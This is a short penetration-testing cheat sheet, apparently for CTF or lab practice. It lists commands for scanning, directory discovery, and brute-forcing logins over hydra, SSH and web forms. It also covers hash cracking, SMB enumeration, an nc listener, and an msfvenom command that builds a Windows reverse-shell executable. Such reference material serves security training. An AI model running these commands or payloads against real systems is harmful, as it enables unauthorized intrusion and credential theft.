Site discovery
gobuster -u http://fakebank.com -w wordlist.txt dir
gobuster -u http://$IP -w wordlist.txt -x php,sh,txt,cgi,html,js,css,py
nmap -sC -sV -oN nmap/initial $IP
Silence discovery:
nmap -sS MACHINE_IP
Ping Scan: Allows scanning the live hosts in the network without going deeper and checking for ports services etc. Usage:
nmap -sn MACHINE_IP
Operating System Scan: Allows scanning of the type of OS running on a live host. Usage:
nmap -O MACHINE_IP
Detecting Services: Get a list of running services on a live host. Usage:
nmap -sV MACHINE_IP
Check for vulns also:
nmap -sV -sC --script vuln MACHINE_IP
nmap -sV -vv --script vuln MACHINE_IP
Webserver vuln. disc.
nikto -host $IP:80
Bruteforce
hydra -l '' -P 3digits.txt -f -v MACHINE_IP http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
hydra -l alexander -P /usr/share/wordlists/rockyou.txt ssh://MACHINE_IP -V
hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt -f -v 10.10.66.58 http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:Invalid username or password." -s 80
Password list generator
cewl -d 2 -m 5 -w passwords.txt http://MACHINE_IP --with-numbers
nc -lnvp 4444
A command-line payload generation tool
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR.IP.ADDRESS.HERE LPORT=4444 -f exe -o reverse.exe
Brute force hash pwd
john --wordlist=greedykeys.txt hash.txt
Search ExploitDB
searchsploit fuel cms
MD5 hash cracker
hashcat -m 0 pash /usr/share/wordlists/rockyou.txt
eg. SMB user name enumeration
enum4linux -e $IP
Steganograpy cracer
stegcracker <file> [<wordlist>]